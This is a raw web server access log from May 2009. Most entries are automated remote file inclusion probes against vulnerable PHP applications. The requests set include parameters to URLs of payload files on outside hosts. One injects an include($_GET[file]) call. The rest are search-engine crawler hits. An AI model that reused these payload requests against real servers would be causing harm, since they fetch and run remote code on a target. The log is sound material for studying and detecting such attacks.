121.101.159.29 - - [13/May/2009:04:54:06 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
121.101.159.29 - - [13/May/2009:04:54:06 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
121.101.159.29 - - [13/May/2009:04:54:07 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
65.55.106.111 - - [13/May/2009:04:56:07 -0500] "GET /logs/access_log.1162339200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.67.180 - - [13/May/2009:04:57:20 -0500] "GET /logs/access_log.1197331200 HTTP/1.1" 200 835 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.18.76.16 - - [13/May/2009:04:57:39 -0500] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:04:57:39 -0500] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:04:58:26 -0500] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:04:58:26 -0500] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
88.191.103.144 - - [13/May/2009:04:58:32 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.825"
88.191.103.144 - - [13/May/2009:04:58:32 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.825"
88.191.103.144 - - [13/May/2009:04:59:03 -0500] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.825"
88.191.103.144 - - [13/May/2009:04:59:03 -0500] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.825"
217.18.76.16 - - [13/May/2009:05:00:40 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:05:00:40 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
84.32.195.2 - - [13/May/2009:05:00:51 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
84.32.195.2 - - [13/May/2009:05:00:51 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
84.32.195.2 - - [13/May/2009:05:00:51 -0500] "GET /logs/access_log.1236816000//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
84.32.195.2 - - [13/May/2009:05:01:02 -0500] "GET /logs/access_log.1236902400//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.117.191.71 - - [13/May/2009:05:01:25 -0500] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.65"
216.117.191.71 - - [13/May/2009:05:01:26 -0500] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.65"
87.106.135.14 - - [13/May/2009:05:01:41 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
87.106.135.14 - - [13/May/2009:05:01:42 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
66.249.67.180 - - [13/May/2009:05:02:35 -0500] "GET /logs/access_log.1150070400 HTTP/1.1" 200 717 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.106.135.14 - - [13/May/2009:05:03:28 -0500] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
87.106.135.14 - - [13/May/2009:05:03:28 -0500] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
66.249.67.180 - - [13/May/2009:05:03:57 -0500] "GET /logs/access_log.1215216000 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.106.228 - - [13/May/2009:05:04:51 -0500] "GET /logs/access_log.1125792000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.221.130.19 - - [13/May/2009:05:05:04 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:05:05:04 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
201.234.41.5 - - [13/May/2009:05:06:02 -0500] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
201.234.41.5 - - [13/May/2009:05:06:03 -0500] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
88.191.103.144 - - [13/May/2009:05:06:04 -0500] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.825"
88.191.103.144 - - [13/May/2009:05:06:04 -0500] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.825"
66.249.67.180 - - [13/May/2009:05:07:55 -0500] "GET /logs/access_log.1181606400 HTTP/1.1" 200 717 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.117.191.71 - - [13/May/2009:05:09:06 -0500] "GET /logs//vwar/admin/admin.php?vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
216.117.191.71 - - [13/May/2009:05:09:06 -0500] "GET //vwar/admin/admin.php?vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.65"
217.18.76.16 - - [13/May/2009:05:09:20 -0500] "GET /logs//vwar/admin/admin.php?vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:05:09:21 -0500] "GET //vwar/admin/admin.php?vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
88.191.103.144 - - [13/May/2009:05:09:36 -0500] "GET /logs//vwar/admin/admin.php?vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.825"
88.191.103.144 - - [13/May/2009:05:09:37 -0500] "GET //vwar/admin/admin.php?vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.825"
87.106.135.14 - - [13/May/2009:05:10:56 -0500] "GET /logs//vwar/admin/admin.php?vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
87.106.135.14 - - [13/May/2009:05:11:06 -0500] "GET //vwar/admin/admin.php?vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
66.249.67.180 - - [13/May/2009:05:11:33 -0500] "GET /logs/access_log.1116460800 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.180 - - [13/May/2009:05:13:11 -0500] "GET /logs/access_log.1180742400 HTTP/1.1" 200 4284 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
188.48.246.193 - - [13/May/2009:05:13:19 -0500] "GET /nun.jpg HTTP/1.1" 200 29472 "-""Mozilla/3.0 (compatible; Indy Library)"
195.228.155.80 - - [13/May/2009:05:15:39 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://212.227.74.68/catalog/safe1.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
195.228.155.80 - - [13/May/2009:05:15:40 -0500] "GET //modules/xfsection/modify.php?dir_module=http://212.227.74.68/catalog/safe1.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:05:17:21 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 200 189195 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:05:17:21 -0500] "GET //?path%5Bdocroot%5D=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:05:17:33 -0500] "GET /logs//admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:05:17:33 -0500] "GET //admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
200.32.100.130 - - [13/May/2009:05:17:40 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:17:40 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:17:43 -0500] "GET /logs/access_log.1237161600//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
74.55.156.2 - - [13/May/2009:05:17:52 -0500] "GET /logs//admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.820"
74.55.156.2 - - [13/May/2009:05:17:53 -0500] "GET //admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.820"
85.214.83.196 - - [13/May/2009:05:18:02 -0500] "GET /logs//admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.69"
85.214.83.196 - - [13/May/2009:05:18:02 -0500] "GET //admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.69"
66.249.67.180 - - [13/May/2009:05:18:27 -0500] "GET /logs/access_log.1118620800 HTTP/1.1" 200 1187 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.32.100.130 - - [13/May/2009:05:18:53 -0500] "GET /logs/access_log.1237507200//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
201.234.41.5 - - [13/May/2009:05:19:45 -0500] "GET /logs//admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
201.234.41.5 - - [13/May/2009:05:19:45 -0500] "GET //admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
69.94.30.156 - - [13/May/2009:05:19:49 -0500] "GET /logs//admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
69.94.30.156 - - [13/May/2009:05:19:49 -0500] "GET //admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
93.187.232.189 - - [13/May/2009:05:21:25 -0500] "GET /logs//index.php?cct_base=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.808"
93.187.232.189 - - [13/May/2009:05:21:25 -0500] "GET //index.php?cct_base=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.808"
93.187.232.189 - - [13/May/2009:05:21:37 -0500] "GET /logs//index.php?cct_base=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.808"
93.187.232.189 - - [13/May/2009:05:21:37 -0500] "GET //index.php?cct_base=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.808"
66.249.67.180 - - [13/May/2009:05:23:48 -0500] "GET /logs/access_log.1150243200 HTTP/1.1" 200 184 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
121.101.159.29 - - [13/May/2009:05:25:16 -0500] "GET /logs/access_log.1240531200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
121.101.159.29 - - [13/May/2009:05:25:16 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
121.101.159.29 - - [13/May/2009:05:25:17 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
66.249.67.180 - - [13/May/2009:05:26:41 -0500] "GET /logs/access_log.1217289600 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.180 - - [13/May/2009:05:29:05 -0500] "GET /logs/access_log.1126656000 HTTP/1.1" 200 178 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
201.234.41.5 - - [13/May/2009:05:30:07 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 200 189195 "-""libwww-perl/5.79"
201.234.41.5 - - [13/May/2009:05:30:07 -0500] "GET //?path%5Bdocroot%5D=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
213.207.110.102 - - [13/May/2009:05:30:40 -0500] "GET /logs////////s_loadenv.inc.php?DOCUMENT_ROOT=http://www.agrippine.net/components/com/image?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
213.207.110.102 - - [13/May/2009:05:30:41 -0500] "GET ////////s_loadenv.inc.php?DOCUMENT_ROOT=http://www.agrippine.net/components/com/image?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
121.101.159.29 - - [13/May/2009:05:30:56 -0500] "GET //jscript.php?my_ms[root]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
121.101.159.29 - - [13/May/2009:05:30:56 -0500] "GET /logs/access_log.1233100800//jscript.php?my_ms[root]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
121.101.159.29 - - [13/May/2009:05:30:56 -0500] "GET /logs//jscript.php?my_ms[root]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
66.249.67.180 - - [13/May/2009:05:34:19 -0500] "GET /logs/access_log.1109980800 HTTP/1.1" 200 2767 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.107.180 - - [13/May/2009:05:35:02 -0500] "GET /logs/access_log.1221523200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.230.165 - - [13/May/2009:05:36:16 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.230.165 - - [13/May/2009:05:36:16 -0500] "GET /_vti_cnf/?M=D HTTP/1.1" 200 676 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
67.15.48.60 - - [13/May/2009:05:39:05 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://cms.halberstadtwerke.de/tip/ligen/.../ids??? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
67.15.48.60 - - [13/May/2009:05:39:06 -0500] "GET //include/admin.lib.inc.php?site_path=http://cms.halberstadtwerke.de/tip/ligen/.../ids??? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
66.249.67.180 - - [13/May/2009:05:39:36 -0500] "GET /logs/access_log.1186963200 HTTP/1.1" 200 481 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.160.4.250 - - [13/May/2009:05:40:15 -0500] "GET /admin.lib.inc.php?site_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
217.160.4.250 - - [13/May/2009:05:40:16 -0500] "GET /logs/access_log.1233187200/admin.lib.inc.php?site_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
217.160.4.250 - - [13/May/2009:05:40:16 -0500] "GET /logs/admin.lib.inc.php?site_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
217.160.4.250 - - [13/May/2009:05:40:44 -0500] "GET /logs/access_log.1232928000/admin.lib.inc.php?site_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
213.207.110.102 - - [13/May/2009:05:41:38 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.agrippine.net/components/com/image?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
213.207.110.102 - - [13/May/2009:05:41:38 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.agrippine.net/components/com/image?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
69.94.56.98 - - [13/May/2009:05:43:00 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.0" 404 332 "-""libwww-perl/5.48"
69.94.56.98 - - [13/May/2009:05:43:00 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.0" 404 327 "-""libwww-perl/5.48"
69.94.56.98 - - [13/May/2009:05:43:03 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.0" 404 336 "-""libwww-perl/5.48"
69.94.56.98 - - [13/May/2009:05:43:03 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.0" 404 331 "-""libwww-perl/5.48"
81.181.203.24 - - [13/May/2009:05:43:48 -0500] "GET //bin/TreeMenuXL.php?_SERVER[DOCUMENT_ROOT]=http://www.depo.org.pk/images/21/ts?? HTTP/1.1" 404 302 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
78.136.7.247 - - [13/May/2009:05:44:45 -0500] "GET /logs/errors.php?error=http://biquad.com.br/catalog/products/1dd.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
78.136.7.247 - - [13/May/2009:05:44:45 -0500] "GET /errors.php?error=http://biquad.com.br/catalog/products/1dd.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
66.249.67.180 - - [13/May/2009:05:44:56 -0500] "GET /logs/access_log.1203465600 HTTP/1.1" 200 145796 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.221.130.19 - - [13/May/2009:05:47:50 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:05:47:50 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:05:48:03 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:05:48:03 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
67.227.156.113 - - [13/May/2009:05:49:22 -0500] "GET //include/write.php?dir=http://tsceskina.com/images/12.TXT? HTTP/1.1" 404 301 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
67.227.156.113 - - [13/May/2009:05:49:22 -0500] "GET /logs//include/write.php?dir=http://tsceskina.com/images/12.TXT? HTTP/1.1" 404 306 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
67.227.156.113 - - [13/May/2009:05:49:22 -0500] "GET /logs/access_log.1230422400//include/write.php?dir=http://tsceskina.com/images/12.TXT? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
66.249.67.180 - - [13/May/2009:05:50:11 -0500] "GET /logs/access_log.1160265600 HTTP/1.1" 200 3794 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.176.196.171 - - [13/May/2009:05:50:46 -0500] "GET /logs/errors.php?error=http://www.geocities.com/cantikpuri/id.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
216.176.196.171 - - [13/May/2009:05:50:46 -0500] "GET /errors.php?error=http://www.geocities.com/cantikpuri/id.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
69.94.56.98 - - [13/May/2009:05:53:34 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.0" 404 334 "-""libwww-perl/5.48"
69.94.56.98 - - [13/May/2009:05:53:35 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.0" 404 329 "-""libwww-perl/5.48"
66.249.67.180 - - [13/May/2009:05:55:28 -0500] "GET /logs/access_log.1155340800 HTTP/1.1" 200 1752 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.176.196.171 - - [13/May/2009:05:55:35 -0500] "GET /?GALLERY_BASEDIR=http://www.geocities.com/cantikpuri/id.txt???? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
216.176.196.171 - - [13/May/2009:05:55:36 -0500] "GET /logs/?GALLERY_BASEDIR=http://www.geocities.com/cantikpuri/id.txt???? HTTP/1.1" 200 189190 "-""libwww-perl/5.79"
217.160.4.250 - - [13/May/2009:05:56:00 -0500] "GET /logs/access_log.1236297600/admin.lib.inc.php?site_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:05:56:57 -0500] "GET /logs/access_log.1216339200 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.94.56.98 - - [13/May/2009:05:57:03 -0500] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://www.depo.org.pk/images/21/ts?? HTTP/1.0" 404 293 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
67.204.0.222 - - [13/May/2009:05:58:19 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:05:58:20 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:05:59:06 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:05:59:07 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
66.249.67.180 - - [13/May/2009:06:00:49 -0500] "GET /logs/access_log.1194825600 HTTP/1.1" 200 15402 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
